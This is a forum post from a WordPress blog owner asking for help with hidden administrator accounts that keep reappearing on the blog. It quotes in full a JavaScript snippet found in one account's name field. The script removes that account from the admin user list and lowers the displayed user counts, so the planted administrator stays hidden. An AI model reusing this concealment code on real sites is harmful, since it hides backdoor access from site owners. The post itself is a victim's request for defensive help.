Authors Created Without My Knowledge
-
Lo All,
I am having the problem that authors are being created on my blog without me knowing. I had noticed a while back that some posts were being accepted without me doing so, which were what my settings were, but when I went to go list all the authors on my blogs homepage, it listed 2 hidden users that didn’t come up in the ‘users and authors’ page in the admin section.
I managed to find and get into these users and I found that it had this javascript in the name field:
… <b id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){ try{ var t=document.getElementById(“user_superuser”); while(t.nodeName!=”TR”){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName(“H3″); var s = ” shown below”; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName(“ul”); for(var i in arr) if(arr[i].className==”subsubsub”){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,”>Administrator (“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } var n=/>Administrator <span class=”count”>\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class=”count”>\((\d+)\)</gi,”>Administrator <span class=\”count\”>(“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } var n=/>All <span class=”count”>\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class=”count”>\((\d+)\)</gi,”>All <span class=\”count\”>(“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script>
Is this some sort of javascript injection technique or are they auto generated users via WordPress?
I’d really like to know how to block this as about 2 weeks after deleting the users, they have now appeared again. I currently have registration on the blog blocked so I have no idea how they’re getting in?
- The topic ‘Authors Created Without My Knowledge’ is closed to new replies.